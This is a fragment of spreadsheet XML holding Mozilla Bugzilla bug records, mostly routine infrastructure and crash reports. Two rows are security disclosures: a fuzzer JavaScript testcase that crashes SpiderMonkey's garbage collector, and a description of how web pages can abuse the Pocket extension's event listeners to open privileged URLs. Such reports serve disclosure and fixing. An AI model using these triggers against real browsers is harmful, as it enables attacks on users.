      <c r="N5629" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5629" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5629" t="inlineStr">
        <is>
          <t>p=2</t>
        </is>
      </c>
      <c r="Q5629" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5629" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5629" t="inlineStr">
        <is>
          <t>2013-03-14</t>
        </is>
      </c>
      <c r="T5629" t="n">
        <v>1</v>
      </c>
      <c r="U5629" t="n">
        <v>0</v>
      </c>
      <c r="V5629" t="n">
        <v>3</v>
      </c>
      <c r="W5629" t="inlineStr">
        <is>
          <t>Its always bothered me that zamboni doesn't use transactions. I'd like to start the API off correctly and use transactions. We could grab the transaction middleware, alter it so it only affects the /api urls and use that. Submission flow might be a bit hard to put in retroactively, but for any new API calls, this should be the way to go.</t>
        </is>
      </c>
      <c r="X5629" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5630">
      <c r="A5630" t="n">
        <v>321366</v>
      </c>
      <c r="B5630" t="inlineStr">
        <is>
          <t>2005-12-23 13:21:48 -0800</t>
        </is>
      </c>
      <c r="C5630" t="inlineStr">
        <is>
          <t>Crash [@PR_Close].[@nsDiskCacheStreamIO::Flush()]</t>
        </is>
      </c>
      <c r="D5630" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:44 -0700</t>
        </is>
      </c>
      <c r="E5630" t="n">
        <v>1</v>
      </c>
      <c r="F5630" t="n">
        <v>1</v>
      </c>
      <c r="G5630" t="n">
        <v>3</v>
      </c>
      <c r="H5630" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5630" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5630" t="inlineStr">
        <is>
          <t>Networking: Cache</t>
        </is>
      </c>
      <c r="K5630" t="inlineStr">
        <is>
          <t>1.8 Branch</t>
        </is>
      </c>
      <c r="L5630" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5630" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5630" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5630" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5630" t="inlineStr">
        <is>
          <t>[camino-1.0.1][camino-1.0.2]</t>
        </is>
      </c>
      <c r="Q5630" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5630" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5630" t="inlineStr">
        <is>
          <t>mozilla1.8.1</t>
        </is>
      </c>
      <c r="T5630" t="n">
        <v>1</v>
      </c>
      <c r="U5630" t="n">
        <v>0</v>
      </c>
      <c r="V5630" t="n">
        <v>21</v>
      </c>
      <c r="W5630" t="inlineStr">
        <is>
          <t>I just experienced a crash in PR_Close, with nsCacheEntryDescriptor::nsOutputStreamWrapper::~nsOutputStreamWrapper and nsHttpChannel::OnStopRequest on the stack.  A full stack trace will be attached.  The crash occurred as a page was finishing loading.
Talkback data show that this is a cross-product and cross-platform crash, and all crashes with PR_Close at the top of the stack show up on the topcrash list.
Some recent TBIDs: TB13206859 TB13199365 TB13191944.  These are from Linux and Mac.  Crashes on Windows don't have usable stacks, TB13202136 TB13201471.</t>
        </is>
      </c>
      <c r="X5630" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5631">
      <c r="A5631" t="n">
        <v>1141382</v>
      </c>
      <c r="B5631" t="inlineStr">
        <is>
          <t>2015-03-09 18:13:10 -0700</t>
        </is>
      </c>
      <c r="C5631" t="inlineStr">
        <is>
          <t>Crash [@ markIfUnmarked] or Assertion failure: entry.isJs(), at vm/SPSProfiler.cpp:371</t>
        </is>
      </c>
      <c r="D5631" t="inlineStr">
        <is>
          <t>2017-01-05 09:03:10 -0800</t>
        </is>
      </c>
      <c r="E5631" t="n">
        <v>1</v>
      </c>
      <c r="F5631" t="n">
        <v>1</v>
      </c>
      <c r="G5631" t="n">
        <v>3</v>
      </c>
      <c r="H5631" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5631" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5631" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5631" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5631" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5631" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5631" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5631" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5631" t="inlineStr">
        <is>
          <t>[jsbugmon:update][adv-main46+]</t>
        </is>
      </c>
      <c r="Q5631" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5631" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5631" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5631" t="n">
        <v>1</v>
      </c>
      <c r="U5631" t="n">
        <v>0</v>
      </c>
      <c r="V5631" t="n">
        <v>7</v>
      </c>
      <c r="W5631" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision eab4a81e4457 (build with --enable-optimize --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --disable-debug, run with --fuzzing-safe --no-threads):
setJitCompilerOption("baseline.warmup.trigger", 045133);
enableSPSProfilingWithSlowAssertions();
DoWhile(new DoWhileObject());
function DoWhileObject() {}    
function DoWhile(object) {
  do {
    throw DoWhile(1)
  } while(object.value);
}
Backtrace:
Program received signal SIGSEGV, Segmentation fault.
markIfUnmarked (cell=&lt;optimized out&gt;, this=&lt;optimized out&gt;, color=0) at js/src/gc/Heap.h:857
857	        if (*word &amp; mask)
#0  markIfUnmarked (cell=&lt;optimized out&gt;, this=&lt;optimized out&gt;, color=0) at js/src/gc/Heap.h:857
#1  markIfUnmarked (color=0, this=&lt;optimized out&gt;) at js/src/gc/Heap.h:1285
#2  js::gc::MarkPermanentAtom (trc=trc@entry=0x16b21d8, atom=&lt;optimized out&gt;, name=name@entry=0xaa2ecf "length2-static-string") at js/src/gc/Marking.cpp:338
#3  0x00000000005cc7e7 in js::StaticStrings::trace (this=0x16c8b90, trc=trc@entry=0x16b21d8) at js/src/vm/String.cpp:718
#4  0x0000000000446424 in js::MarkPermanentAtoms (trc=trc@entry=0x16b21d8) at js/src/jsatom.cpp:223
#5  0x0000000000628fcf in js::gc::GCRuntime::markRuntime (this=this@entry=0x16aa550, trc=trc@entry=0x16b21d8, traceOrMark=traceOrMark@entry=js::gc::GCRuntime::MarkRuntime, rootsSource=rootsSource@entry=js::gc::GCRuntime::TraceRoots) at js/src/gc/RootMarking.cpp:472
#6  0x00000000008727bc in js::gc::GCRuntime::beginMarkPhase (this=this@entry=0x16aa550, reason=reason@entry=JS::gcreason::DESTROY_CONTEXT) at js/src/jsgc.cpp:4017
#7  0x00000000008982b9 in js::gc::GCRuntime::incrementalCollectSlice (this=this@entry=0x16aa550, budget=..., reason=reason@entry=JS::gcreason::DESTROY_CONTEXT) at js/src/jsgc.cpp:5889
#8  0x0000000000898ebe in js::gc::GCRuntime::gcCycle (this=this@entry=0x16aa550, incremental=incremental@entry=false, budget=..., reason=reason@entry=JS::gcreason::DESTROY_CONTEXT) at js/src/jsgc.cpp:6126
#9  0x0000000000899183 in js::gc::GCRuntime::collect (this=this@entry=0x16aa550, incremental=incremental@entry=false, budget=..., reason=reason@entry=JS::gcreason::DESTROY_CONTEXT) at js/src/jsgc.cpp:6238
#10 0x0000000000899767 in js::gc::GCRuntime::gc (this=this@entry=0x16aa550, gckind=gckind@entry=GC_NORMAL, reason=reason@entry=JS::gcreason::DESTROY_CONTEXT) at js/src/jsgc.cpp:6299
#11 0x0000000000819b43 in js::DestroyContext (cx=0x16c7fe0, mode=js::DCM_FORCE_GC) at js/src/jscntxt.cpp:185
#12 0x0000000000819c4a in JS_DestroyContext (cx=&lt;optimized out&gt;) at js/src/jsapi.cpp:675
#13 0x0000000000416ab9 in DestroyContext (withGC=true, cx=0x16c7fe0) at js/src/shell/js.cpp:5639
#14 main (argc=&lt;optimized out&gt;, argv=&lt;optimized out&gt;, envp=&lt;optimized out&gt;) at js/src/shell/js.cpp:6394
rax	0x80000	524288
rbx	0x16b21d8	23798232
rcx	0x13	19
rdx	0x7ff7f7efc618	140702993335832
rsi	0x7ff7f7efc0a0	140702993334432
rdi	0x16b21d8	23798232
rbp	0x16b21d8	23798232
rsp	0x7fffffffd380	140737488343936
r8	0x6e	110
r9	0x1	1
r10	0x1	1
r11	0x1738b10	24349456
r12	0x16c8b90	23890832
r13	0x16b21d8	23798232
r14	0x1	1
r15	0x16bcd40	23842112
rip	0x4d6056 &lt;js::gc::MarkPermanentAtom(JSTracer*, JSAtom*, char const*)+134&gt;
=&gt; 0x4d6056 &lt;js::gc::MarkPermanentAtom(JSTracer*, JSAtom*, char const*)+134&gt;:	mov    (%rdx),%rcx
   0x4d6059 &lt;js::gc::MarkPermanentAtom(JSTracer*, JSAtom*, char const*)+137&gt;:	test   %rax,%rcx
Marking s-s because the crash looks bad and involves GC.</t>
        </is>
      </c>
      <c r="X5631" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5632">
      <c r="A5632" t="n">
        <v>1154009</v>
      </c>
      <c r="B5632" t="inlineStr">
        <is>
          <t>2015-04-13 12:38:14 -0700</t>
        </is>
      </c>
      <c r="C5632" t="inlineStr">
        <is>
          <t>Ingest builds as their real OS version, rather than a convenient one for UI whitespace collapsing</t>
        </is>
      </c>
      <c r="D5632" t="inlineStr">
        <is>
          <t>2015-05-20 04:34:54 -0700</t>
        </is>
      </c>
      <c r="E5632" t="n">
        <v>1</v>
      </c>
      <c r="F5632" t="n">
        <v>1</v>
      </c>
      <c r="G5632" t="n">
        <v>7</v>
      </c>
      <c r="H5632" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5632" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J5632" t="inlineStr">
        <is>
          <t>Treeherder: Data Ingestion</t>
        </is>
      </c>
      <c r="K5632" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L5632" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5632" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5632" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5632" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5632" t="inlineStr"/>
      <c r="Q5632" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5632" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5632" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5632" t="n">
        <v>1</v>
      </c>
      <c r="U5632" t="n">
        <v>0</v>
      </c>
      <c r="V5632" t="n">
        <v>19</v>
      </c>
      <c r="W5632" t="inlineStr">
        <is>
          <t>Created attachment 8591847
Screenshot of confusing Treeherder display
When viewing a try push, treeherder shows different OS versions in the main display and in the detailed job view at the bottom. This makes it difficult to know how to reproduce build failures.
I've attached a screenshot showing the view of this try push:
https://treeherder.mozilla.org/#/jobs?repo=try&amp;revision=58e16f6effdc
Note that at the top it says "OS X 10.8 opt", but when I click on that build to see the detials, the display at the bottom says "OS X 10.7 try build".
This may seem like a minor issue; it's just a label. But every build failure is a problem I need to be able to reproduce and fix, in order to make progress in my work. So having accurate information about the build environment is critical.</t>
        </is>
      </c>
      <c r="X5632" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5633">
      <c r="A5633" t="n">
        <v>1439028</v>
      </c>
      <c r="B5633" t="inlineStr">
        <is>
          <t>2018-02-16 16:06:48 -0800</t>
        </is>
      </c>
      <c r="C5633" t="inlineStr">
        <is>
          <t>[e2e-tests] Poll SCM every 5 minutes, and run suite once daily, regardless</t>
        </is>
      </c>
      <c r="D5633" t="inlineStr">
        <is>
          <t>2018-02-21 04:11:22 -0800</t>
        </is>
      </c>
      <c r="E5633" t="n">
        <v>1</v>
      </c>
      <c r="F5633" t="n">
        <v>1</v>
      </c>
      <c r="G5633" t="n">
        <v>4</v>
      </c>
      <c r="H5633" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5633" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J5633" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5633" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5633" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5633" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5633" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5633" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5633" t="inlineStr"/>
      <c r="Q5633" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5633" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5633" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5633" t="n">
        <v>1</v>
      </c>
      <c r="U5633" t="n">
        <v>0</v>
      </c>
      <c r="V5633" t="n">
        <v>3</v>
      </c>
      <c r="W5633" t="inlineStr">
        <is>
          <t>We've been slowly implementing PRs across our Web-automation suites, running in Jenkins, to both poll SCM for commits/changes, as well as run the test-automation suite once daily.
Approval to do so for just the e2e-tests/ portion, running in our Jenkins instance?</t>
        </is>
      </c>
      <c r="X5633" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5634">
      <c r="A5634" t="n">
        <v>652722</v>
      </c>
      <c r="B5634" t="inlineStr">
        <is>
          <t>2011-04-25 17:32:33 -0700</t>
        </is>
      </c>
      <c r="C5634" t="inlineStr">
        <is>
          <t>Fonts look broken on webifyme due to 403 on use.typekit.com</t>
        </is>
      </c>
      <c r="D5634" t="inlineStr">
        <is>
          <t>2011-08-14 14:34:01 -0700</t>
        </is>
      </c>
      <c r="E5634" t="n">
        <v>1</v>
      </c>
      <c r="F5634" t="n">
        <v>1</v>
      </c>
      <c r="G5634" t="n">
        <v>5</v>
      </c>
      <c r="H5634" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5634" t="inlineStr">
        <is>
          <t>Websites</t>
        </is>
      </c>
      <c r="J5634" t="inlineStr">
        <is>
          <t>webifyme.org</t>
        </is>
      </c>
      <c r="K5634" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5634" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5634" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5634" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5634" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5634" t="inlineStr"/>
      <c r="Q5634" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5634" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5634" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="T5634" t="n">
        <v>1</v>
      </c>
      <c r="U5634" t="n">
        <v>0</v>
      </c>
      <c r="V5634" t="n">
        <v>7</v>
      </c>
      <c r="W5634" t="inlineStr">
        <is>
          <t>Created attachment 528235
screenshot
Fonts look broken on webifyme(http://webifyme-dev.allizom.org/) due to 403 on use.typekit.com
http://use.typekit.com/k/sxi3cin-e.css?3bb2a6e53c9684ffdc9a9aff1b5b2a6276adde0ff798449a3bfbdba6e7af221c57d81edfe847d03b2a77f497dad2e93e0fa92fb715c1596992f0887c7d6a3979d959433d5548a788eff5e43ad06b8b5de4c9dd13f35c7a3726958f is a 403</t>
        </is>
      </c>
      <c r="X5634" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5635">
      <c r="A5635" t="n">
        <v>1211275</v>
      </c>
      <c r="B5635" t="inlineStr">
        <is>
          <t>2015-10-04 11:02:54 -0700</t>
        </is>
      </c>
      <c r="C5635" t="inlineStr">
        <is>
          <t>Remove unused jobsample.json and job_data.json.sample</t>
        </is>
      </c>
      <c r="D5635" t="inlineStr">
        <is>
          <t>2021-12-05 14:49:36 -0800</t>
        </is>
      </c>
      <c r="E5635" t="n">
        <v>1</v>
      </c>
      <c r="F5635" t="n">
        <v>1</v>
      </c>
      <c r="G5635" t="n">
        <v>7</v>
      </c>
      <c r="H5635" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5635" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J5635" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K5635" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L5635" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5635" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5635" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5635" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5635" t="inlineStr"/>
      <c r="Q5635" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5635" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5635" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5635" t="n">
        <v>1</v>
      </c>
      <c r="U5635" t="n">
        <v>0</v>
      </c>
      <c r="V5635" t="n">
        <v>5</v>
      </c>
      <c r="W5635" t="inlineStr">
        <is>
          <t>Both of these files are unused:
treeherder/model/sample_data/job_data.json.sample
treeherder/model/sample_data/jobsample.json</t>
        </is>
      </c>
      <c r="X5635" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5636">
      <c r="A5636" t="n">
        <v>1357389</v>
      </c>
      <c r="B5636" t="inlineStr">
        <is>
          <t>2017-04-18 05:36:05 -0700</t>
        </is>
      </c>
      <c r="C5636" t="inlineStr">
        <is>
          <t>Update to nodejs 7.9.0</t>
        </is>
      </c>
      <c r="D5636" t="inlineStr">
        <is>
          <t>2017-04-18 05:55:34 -0700</t>
        </is>
      </c>
      <c r="E5636" t="n">
        <v>1</v>
      </c>
      <c r="F5636" t="n">
        <v>1</v>
      </c>
      <c r="G5636" t="n">
        <v>7</v>
      </c>
      <c r="H5636" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5636" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J5636" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K5636" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L5636" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5636" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5636" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5636" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5636" t="inlineStr"/>
      <c r="Q5636" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5636" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5636" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5636" t="n">
        <v>1</v>
      </c>
      <c r="U5636" t="n">
        <v>0</v>
      </c>
      <c r="V5636" t="n">
        <v>3</v>
      </c>
      <c r="W5636" t="inlineStr">
        <is>
          <t>We're currently using 7.7.2.</t>
        </is>
      </c>
      <c r="X5636" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5637">
      <c r="A5637" t="n">
        <v>1320039</v>
      </c>
      <c r="B5637" t="inlineStr">
        <is>
          <t>2016-11-24 02:21:58 -0800</t>
        </is>
      </c>
      <c r="C5637" t="inlineStr">
        <is>
          <t>Pocket extension unnecessarily exposes its messaging interface to web pages</t>
        </is>
      </c>
      <c r="D5637" t="inlineStr">
        <is>
          <t>2024-05-30 09:23:31 -0700</t>
        </is>
      </c>
      <c r="E5637" t="n">
        <v>1</v>
      </c>
      <c r="F5637" t="n">
        <v>1</v>
      </c>
      <c r="G5637" t="n">
        <v>2</v>
      </c>
      <c r="H5637" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5637" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5637" t="inlineStr">
        <is>
          <t>Pocket</t>
        </is>
      </c>
      <c r="K5637" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5637" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5637" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5637" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5637" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5637" t="inlineStr">
        <is>
          <t>[adv-main50.1+][adv-esr45.6+]</t>
        </is>
      </c>
      <c r="Q5637" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5637" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5637" t="inlineStr">
        <is>
          <t>Firefox 53</t>
        </is>
      </c>
      <c r="T5637" t="n">
        <v>1</v>
      </c>
      <c r="U5637" t="n">
        <v>0</v>
      </c>
      <c r="V5637" t="n">
        <v>34</v>
      </c>
      <c r="W5637" t="inlineStr">
        <is>
          <t>Created attachment 8814034
Proof of concept webpage
Note: I am reporting this issue here rather than to Pocket because Pocket is an integral part of Firefox and cannot be disabled or removed by regular means.
The bubble displayed by the Pocket toolbar button is actually an &lt;iframe&gt; loading from either about:pocket-signup or about:pocket-saved. In order to communicate with that frame the Pocket extension registers event listeners on browser.xul's document, accepting untrusted events. The event listeners don't do anything to verify the origin of the event so that events bubbling up from the browser's content area will be processed as well.
Steps to reproduce (I tested with Firefox 53.0a1 nightly 2016-11-23 on macOS 10.12):
1. Make sure that E10S is disabled (with E10S events from content won't bubble up to the browser).
2. Click the Pocket button to make sure that the extension is initialized. It doesn't matter whether anything happens after that, you don't need to sign up with Pocket.
3. Now open the attached webpage in Firefox and click the "Open about:preferences with Sync tab selected".
This button will open about:preferences#sync page, something that web pages normally cannot do. Pop-up blocker doesn't affect this, so websites can open any number of pop-ups at any time this way. Security checks don't apply either so opening arbitrary file:///, chrome:// or about: URLs is possible.
Note that this only abuses "openTabWithUrl" message that Pocket listens to. There is a number of other message listeners which might also have abuse potential - e.g. "deleteItem" message allows deleting items from Pocket. Note also that the website can detect when its attack was successful because the Pocket extension will remove the event target from the page.
Also, this issue is completely avoidable. There is only one Pocket frame in the browser document, the event listeners could be registered directly on that iframe element rather than on the document - this would make sure that no events from other sources will be received.</t>
        </is>
      </c>
      <c r="X5637" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5638">
      <c r="A5638" t="n">
        <v>1133138</v>
      </c>
      <c r="B5638" t="inlineStr">
        <is>
          <t>2015-02-13 16:24:52 -0800</t>
        </is>
      </c>
      <c r="C5638" t="inlineStr">
        <is>
          <t>Alias python/pip/easy_install to their Python 2.7 versions on stage and prod</t>
        </is>
      </c>
      <c r="D5638" t="inlineStr">
        <is>
          <t>2015-02-17 10:30:20 -0800</t>
        </is>
      </c>
      <c r="E5638" t="n">
        <v>1</v>
      </c>
      <c r="F5638" t="n">
        <v>1</v>
      </c>
      <c r="G5638" t="n">
        <v>7</v>
      </c>
      <c r="H5638" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5638" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J5638" t="inlineStr">
        <is>
          <t>Treeherder: Infrastructure</t>
        </is>
      </c>
      <c r="K5638" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L5638" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5638" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5638" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5638" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5638" t="inlineStr"/>
      <c r="Q5638" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5638" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5638" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5638" t="n">
        <v>1</v>
      </c>
      <c r="U5638" t="n">
        <v>0</v>
      </c>
      <c r="V5638" t="n">
        <v>10</v>
      </c>
      <c r="W5638" t="inlineStr">
        <is>
          <t>Please could we alias python to Python2.7 rather than Python2.6?
Currently:
[emorley@treeherderadm.private.scl3 ~]$ multi treeherder python --version
...
[treeherder1.webapp.scl3.mozilla.com] err: Python 2.6.6
[treeherder2.webapp.scl3.mozilla.com] err: Python 2.6.6
[treeherder3.webapp.scl3.mozilla.com] err: Python 2.6.6
[treeherder-processor1.private.scl3.mozilla.com] err: Python 2.6.6
[treeherder-processor2.private.scl3.mozilla.com] err: Python 2.6.6
[treeherder-processor3.private.scl3.mozilla.com] err: Python 2.6.6
[treeherder-etl1.private.scl3.mozilla.com] err: Python 2.6.6
[treeherder-etl2.private.scl3.mozilla.com] err: Python 2.6.6
[treeherder-rabbitmq1.private.scl3.mozilla.com] err: Python 2.6.6
[emorley@treeherderadm.private.scl3 ~]$ multi treeherder-stage python --version
...
[treeherder1.stage.webapp.scl3.mozilla.com] err: Python 2.6.6
[treeherder2.stage.webapp.scl3.mozilla.com] err: Python 2.6.6
[treeherder3.stage.webapp.scl3.mozilla.com] err: Python 2.6.6
[treeherder-processor1.stage.private.scl3.mozilla.com] err: Python 2.6.6
[treeherder-processor2.stage.private.scl3.mozilla.com] err: Python 2.6.6
[treeherder-processor3.stage.private.scl3.mozilla.com] err: Python 2.6.6
[treeherder-etl1.stage.private.scl3.mozilla.com] err: Python 2.6.6
[treeherder-etl2.stage.private.scl3.mozilla.com] err: Python 2.6.6
[treeherder-rabbitmq1.stage.private.scl3.mozilla.com] err: Python 2.6.6
And unfortunately:
[emorley@treeherderadm.private.scl3 ~]$ multi treeherder-stage "ps axo command | egrep '^/usr/bin/python ' | cut -d' ' -f-2"
...
[treeherder1.stage.webapp.scl3.mozilla.com] out: /usr/bin/python /usr/bin/supervisord
[treeherder2.stage.webapp.scl3.mozilla.com] out: /usr/bin/python /usr/bin/supervisord
[treeherder3.stage.webapp.scl3.mozilla.com] out: /usr/bin/python /usr/bin/gunicorn
[treeherder3.stage.webapp.scl3.mozilla.com] out: /usr/bin/python /usr/bin/gunicorn
[treeherder3.stage.webapp.scl3.mozilla.com] out: /usr/bin/python /usr/bin/gunicorn
[treeherder3.stage.webapp.scl3.mozilla.com] out: /usr/bin/python /usr/bin/gunicorn
[treeherder3.stage.webapp.scl3.mozilla.com] out: /usr/bin/python /usr/bin/gunicorn
[treeherder3.stage.webapp.scl3.mozilla.com] out: /usr/bin/python /usr/bin/gunicorn
[treeherder3.stage.webapp.scl3.mozilla.com] out: /usr/bin/python /usr/bin/supervisord
[treeherder-etl1.stage.private.scl3.mozilla.com] out: /usr/bin/python /usr/bin/supervisord
[treeherder-etl2.stage.private.scl3.mozilla.com] out: /usr/bin/python /usr/bin/supervisord
[treeherder-processor1.stage.private.scl3.mozilla.com] out: /usr/bin/python /usr/bin/celery
[treeherder-processor1.stage.private.scl3.mozilla.com] out: /usr/bin/python /usr/bin/celery
[treeherder-processor1.stage.private.scl3.mozilla.com] out: /usr/bin/python /usr/bin/supervisord
[treeherder-processor2.stage.private.scl3.mozilla.com] out: /usr/bin/python /usr/bin/celery
[treeherder-processor2.stage.private.scl3.mozilla.com] out: /usr/bin/python /usr/bin/celery
[treeherder-processor2.stage.private.scl3.mozilla.com] out: /usr/bin/python /usr/bin/celery
[treeherder-processor2.stage.private.scl3.mozilla.com] out: /usr/bin/python /usr/bin/celery
[treeherder-processor2.stage.private.scl3.mozilla.com] out: /usr/bin/python /usr/bin/celery
[treeherder-processor2.stage.private.scl3.mozilla.com] out: /usr/bin/python /usr/bin/celery
[treeherder-processor2.stage.private.scl3.mozilla.com] out: /usr/bin/python /usr/bin/celery
[treeherder-processor2.stage.private.scl3.mozilla.com] out: /usr/bin/python /usr/bin/celery
[treeherder-processor2.stage.private.scl3.mozilla.com] out: /usr/bin/python /usr/bin/supervisord
[treeherder-processor3.stage.private.scl3.mozilla.com] out: /usr/bin/python /usr/bin/celery
[treeherder-processor3.stage.private.scl3.mozilla.com] out: /usr/bin/python /usr/bin/supervisord
[treeherder-rabbitmq1.stage.private.scl3.mozilla.com] out: /usr/bin/python /usr/bin/supervisord
